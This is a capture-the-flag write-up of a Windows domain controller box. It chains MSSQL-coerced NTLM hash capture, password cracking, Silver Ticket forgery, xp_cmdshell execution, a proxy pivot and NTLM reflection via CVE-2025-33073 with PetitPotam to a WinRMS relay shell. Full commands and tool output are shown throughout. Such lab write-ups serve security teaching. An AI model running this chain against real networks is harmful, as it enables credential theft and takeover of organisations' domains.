by 0xW1LD
As is common in real-life Windows penetration tests, the Signed box starts you off with credentials for an account that can access the MSSQL service:
scott/Sm230#C5NatH
As usual we start with an nmap port scan; only 1433 comes back open:
PORT STATE SERVICE REASON VERSION
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.198.89:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-11T18:50:52
| Not valid after: 2055-10-11T18:50:52
| MD5: 0f0d:aab4:b50a:4923:c34b:f582:d0d7:7e31
| SHA-1: 8129:ef83:0469:0e3c:dca9:2742:122a:26e0:92af:ba22
| -----BEGIN CERTIFICATE-----
| MIIEADCCAmigAwIBAgIQHhrmYZjLM45C/QSbFaURejANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUxMDExMTg1MDUyWhgPMjA1NTEwMTExODUwNTJaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBAK39NqKO
| mfbn86epy1EzNkza5Gl5yB66I8PgpdJt657AZRUfUqVyTcM31zBWH+dsOa5OoDWn
| NSL2bJGRx0Aq8WF0tNOPoo0cu5XJADSTylLuwt4/W25PlqBN1LPbTDo4EFJe80U3
| 3J5II2yDiGbHxscHONThyPcIuuaDCuuvq34Ra1mANnpbJ6KFssIOLzLCZcEbfJDL
| Yc6irbLOV9wgCwyE8YoDiWrCSFjO4PDfFTpsRR21KBjf8MNqnM6Gil1m8XJOiAp7
| gMG8ElrxcjmN5zyrc3CbO0dVXLG6EqNokq+a/x2FRFAqnKgW6eloxx+qvqiNg+uU
| z5XHXoKLKh4PZc4nGwrYHFqELJmP73BiFoSnPVzeQUm+ccQYyjJaC+b5a8/p3LPN
| UOT2tpAlPGoci/BpcU4SY5lxnwIqrWVK5rzzAtxmOmeQCM3vcStF2VnwDKwEj2o3
| 4ZT0IqJO1d6fZ39FpIOP5h/7/vlubRybvZkepK+KHQERjAp+vhiqwgs2gQIDAQAB
| MA0GCSqGSIb3DQEBCwUAA4IBgQBluiUnXTN96/4GZeyaIVnnc3pscWA0Lqw1HiKe
| +5+n6FaXieOurWVFpUpIMx4etRjCkhmneKAyCBaFBnmA+f4kJo0YuYyssALfwHXd
| Sen2rObHnYMDQpwcg/ox9bDVW4UatQZsvAsK+L47Um/x/EwRR9QiYUigc9Le+MGS
| PLdXP6L7d/eo839f6XBO9YJRK2j2NAl6Cw3H0JcAX80JZw1t9WQa5ns9yYss11+I
| AcUaOLI3DZKRsLrO/U98sr6lTGCmX7/ZGOFbTn/Z27Yhj3AdbI2Ga3lvQZwVNDNj
| y4jUhwekK2CV6ytF3w5Z/6baOu684snijMbaa46k9HO2pX+wwnrbIELj/8Hs7f1y
| sSPdBpTyijWiKq+nZQCnWUkNOLi5hpVhHPCnIZrN3l6hHfEiCFtVziMcdSekJ8A+
| lNhjwh2HxYLZACIPuzFBlh/ZYS44F5CyS6erXsrojJITE7H3J5Hn7V5PumwLEXeF
| HPBD//Ptab2zIf4R/tbg7CAvaoE=
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 10.129.198.89:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-10-11T20:03:51+00:00; 0s from scanner time.
Given the assumed-breach scenario we already know MSSQL is running on 1433, so we can use the provided credentials to connect and enumerate.
SQL (scott guest@master)> select @@version;
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Enterprise Evaluation Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL (scott guest@master)> xp_dirtree
subdirectory depth file
------------ ----- ----
xp_dirtree accepts a UNC path, and SQL Server will authenticate to that SMB share with its own service account, so let's start Responder to catch the authentication.
sudo responder -I tun0
Now run xp_dirtree against a share on our IP and hope for a hash we can crack.
SQL (scott guest@master)> xp_dirtree \\10.10.14.160\w1ld
subdirectory depth file
------------ ----- ----
Back in responder we get a hash!
[SMB] NTLMv2-SSP Client : 10.129.198.89
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:9b216e485839fa68:[REDACTED]
Let’s pass it over to hashcat and take a look.
hashcat -a 0 mssqlsvc.pem /usr/share/wordlists/rockyou.txt
<SNIP>
MSSQLSVC::SIGNED:9b216e485839fa68:[REDACTED]:[REDACTED]
Looks like we got a crack, let’s see if we can authenticate to the domain.
nxc mssql dc01.signed.htb -u mssqlsvc -p [REDACTED]
MSSQL 10.129.198.89 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)
MSSQL 10.129.198.89 1433 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
We can authenticate, and just like that we have a foothold!
Looking around with enum_logins, one entry stands out: the Windows group SIGNED\IT is a SQL login with the sysadmin role, while scott and Domain Users hold no server roles at all.
SQL (SIGNED\mssqlsvc guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
SIGNED\IT WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
scott SQL_LOGIN 0 0 0 0 0 0 0 0 0
SIGNED\Domain Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
The service account matters here: mssqlsvc is the account SQL Server runs as, so its password (NT hash) is the key Kerberos uses to encrypt service tickets for this MSSQL instance. With that hash we can forge a service ticket (a Silver Ticket) whose PAC claims we are Administrator and a member of SIGNED\IT, and the service will accept it without the KDC ever being involved. For that we need the NT hash, the domain SID and the RID of the IT group, so let's collect them.
First, the RID of the IT group.
nxc mssql $DC -u $USER -p $PASS --rid-brute
<SNIP>
MSSQL 10.129.198.89 1433 DC01 1105: SIGNED\IT
Now let's compute the NT hash of the cracked password. There are a few ways to do this; I like openssl. On OpenSSL 3 the md4 digest lives in the legacy provider, so add -provider legacy -provider default if the command errors out.
echo -n '[REDACTED]' | iconv -t utf16le | openssl dgst -md4
MD4(stdin)= ef69[REDACTED]
Next we need the domain SID. Only MSSQL is exposed, so we pull the SIDs through T-SQL: SUSER_SID(name) returns a login's binary SID and fn_varbintohexstr renders it as hex.
SQL (SIGNED\mssqlsvc guest@master)> SELECT name as LoginName, master.dbo.fn_varbintohexstr(SUSER_SID(name)) AS SID_HEX, type_desc AS LoginType From sys.server_principals where type in ('U','G') ORDER BY create_date DESC;
LoginName SID_HEX LoginType
------------------------- ------------------------------------------------------------------ -------------
SIGNED\Domain Users 0x0105000000000005150000005b7bb0f398aa2245ad4a1ca401020000 WINDOWS_GROUP
NT SERVICE\SQLTELEMETRY 0x010600000000000550000000447a1a9ee0235381234a54aa9bd0549c4fcc0642 WINDOWS_LOGIN
NT SERVICE\SQLSERVERAGENT 0x010600000000000550000000dca88f14b79fd47a992a3d8943f829a726066357 WINDOWS_LOGIN
NT AUTHORITY\SYSTEM 0x010100000000000512000000 WINDOWS_LOGIN
NT SERVICE\MSSQLSERVER 0x010600000000000550000000e20f4fe7b15874e48e19026478c2dc9ac307b83e WINDOWS_LOGIN
NT SERVICE\Winmgmt 0x0106000000000005500000005a048ddff9c7430ab450d4e7477a2172ab4170f4 WINDOWS_LOGIN
NT SERVICE\SQLWriter 0x010600000000000550000000732b9753646ef90356745cb675c3aa6cd6b4d28b WINDOWS_LOGIN
SIGNED\IT 0x0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000 WINDOWS_GROUP
A short Python one-liner turns the hex into the textual SID: byte 0 is the revision, byte 1 the sub-authority count, bytes 2-7 the 48-bit big-endian identifier authority, and every following 4 bytes a little-endian sub-authority.
python3 -c "import sys; sid_hex='0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'; b=bytes.fromhex(sid_hex); print(f'S-{b[0]}-{int.from_bytes(b[2:8], \"big\")}-' + '-'.join(str(int.from_bytes(b[i:i+4], \"little\")) for i in range(8, len(b), 4)))"
S-1-5-21-4088429403-1159899800-2753317549-1105
Strip the last sub-authority, which is the RID of SIGNED\IT (1105, matching the --rid-brute output; that is why I converted that group's hex), and what remains is the domain SID.
S-1-5-21-4088429403-1159899800-2753317549
Now let’s put it all together into a silver ticket attack using ticketer.py.
ticketer.py -nthash $HASH -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain $D -spn $USER/$DC -groups 1105 Administrator
<SNIP>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
Now if all goes well we should be able to authenticate to the mssql service as Administrator using this ticket.
KRB5CCNAME=Administrator.ccache mssqlclient.py $DC -k -no-pass
<SNIP>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\Administrator dbo@master)>
Success! As a member of SIGNED\IT we are sysadmin, so let's enable xp_cmdshell.
SQL (SIGNED\Administrator dbo@master)> enable_xp_cmdshell
INFO(DC01): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC01): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell whoami
output
---------------
signed\mssqlsvc
NUL
Just like that, we have User! Note that xp_cmdshell executes as the SQL Server service account signed\mssqlsvc, not as Administrator: the forged ticket changed who SQL Server believes is logged in, not the account the service process runs under.
After grabbing a reverse shell (the connection back to 10.10.14.18:3232 in the netstat output below), we look around for local privilege escalation. The most interesting observation is that this host is the domain controller itself and the whole Active Directory service set is listening: Kerberos (88, 464), LDAP/LDAPS and the global catalog (389, 636, 3268, 3269), DNS (53), SMB (445), WinRM over HTTPS (5986) and ADWS (9389), even though only 1433 was reachable from outside.
PS C:\Windows\system32> netstat -anop TCP
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 908
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 908
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:5986 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 1336
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1272
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 1520
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 2292
TCP 0.0.0.0:49675 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:49678 0.0.0.0:0 LISTENING 648
TCP 0.0.0.0:64261 0.0.0.0:0 LISTENING 2044
TCP 0.0.0.0:65238 0.0.0.0:0 LISTENING 2960
TCP 10.129.139.69:53 0.0.0.0:0 LISTENING 2044
TCP 10.129.139.69:139 0.0.0.0:0 LISTENING 4
TCP 10.129.139.69:1433 10.10.14.18:54438 ESTABLISHED 924
TCP 10.129.139.69:64195 10.10.14.18:3232 ESTABLISHED 3848
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2044
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 924
Use whatever method you like to reach these ports from the attacker machine; I used a SOCKS proxy with proxychains.
proxychains -q nxc smb 127.0.0.1 -u $USER -p $PASS
SMB 127.0.0.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
Going back to domain privilege escalation enumeration, nxc's ntlm_reflection module reports that DC01 is vulnerable to NTLM reflection (CVE-2025-33073).
proxychains -q nxc smb 127.0.0.1 -u $USER -p $PASS -M ntlm_reflection
SMB 127.0.0.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
NTLM_REF... 127.0.0.1 445 DC01 VULNERABLE (can relay SMB to other protocols except SMB on 127.0.0.1)
Interesting to note: SMB signing is enabled on DC01 (signing:True above), which is often thought to block CVE-2025-33073, but signing only protects relays whose target is SMB itself. The reflected authentication can still be sent to other services on the same host, such as WinRM over HTTPS (WINRMS) and MSSQL, which is exactly what the module reports ("can relay SMB to other protocols except SMB on 127.0.0.1"), as can be seen in this thread.
So let's do the NTLM reflection attack. First, add a DNS record that points the crafted hostname at our attacker IP; the coerced DC01 will resolve this name, connect to our relay and authenticate. The odd name is the core of the bug: it is "localhost" followed by a marshalled credential target-info suffix. The SMB client strips that suffix when building the NTLM target name, so lsass treats the target as the local machine and produces a local authentication that DC01 itself accepts when it is reflected back. Note that I run dnstool through proxychains; with only the proxy it would send its DNS query to localhost, which does not work, so I also pass -dns-ip to point it at DC01.
proxychains -q dnstool -u 'signed.htb\mssqlsvc' -p "$PASS" signed.htb -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d '10.10.14.18' -dns-ip 10.129.139.69
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Check for the DNS record.
dig localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb @10.129.139.69
; <<>> DiG 9.20.11-4+b1-Debian <<>> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb @10.129.139.69
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44809
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb. IN A
;; ANSWER SECTION:
localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.signed.htb. 180 IN A 10.10.14.18
;; Query time: 332 msec
;; SERVER: 10.129.139.69#53(10.129.139.69) (UDP)
;; WHEN: Mon Oct 13 01:28:06 EDT 2025
;; MSG SIZE rcvd: 109
Success, we got an answer and it points at our IP! Next start an ntlmrelayx listener with the WINRMS target; make sure you run a recent development build of impacket (the 0.13.0.dev banner below), since older releases have no WinRMS protocol client.
proxychains -q ntlmrelayx.py -t "winrms://signed.htb" -smb2support
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled
[*] Servers started, waiting for connections
Finally, coerce DC01 into authenticating to the crafted hostname. PetitPotam works for this, but nxc's coerce_plus module does the same with L= set to the listener name and M=petit selecting the EFSRPC trigger:
proxychains -q nxc smb 127.0.0.1 -u $USER -p $PASS -M coerce_plus -o L=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA M=petit
SMB 127.0.0.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 127.0.0.1 445 DC01 [+] SIGNED.HTB\mssqlsvc:[REDACTED]
COERCE_PLUS 127.0.0.1 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS 127.0.0.1 445 DC01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
Back in ntlmrelayx the coerced connection arrives and is relayed to WinRMS. The signing warning can be ignored here: the relay succeeds (the HTTP 500 from WinRM is what ntlmrelayx treats as a successful login) and an interactive shell is bound to 127.0.0.1:11000.
[*] (SMB): Received connection from 10.129.139.69, attacking target winrms://signed.htb
[!] The client requested signing, relaying to WinRMS might not work!
[*] HTTP server returned error code 500, this is expected, treating as a successful login
[*] (SMB): Authenticating connection from /@10.129.139.69 against winrms://signed.htb SUCCEED [1]
[*] winrms:///@signed.htb [1] -> Started interactive WinRMS shell via TCP on 127.0.0.1:11000
[*] All targets processed!
So let’s connect to this shell
nc localhost 11000
Type help for list of commands
# dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is BED4-436E
Directory of C:\Users\Administrator\Desktop
10/06/2025 05:04 AM <DIR> .
10/06/2025 05:04 AM <DIR> ..
10/12/2025 07:22 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,072,795,136 bytes free
Just like that, we have Root!
tags: boxes - os/windows - diff/medium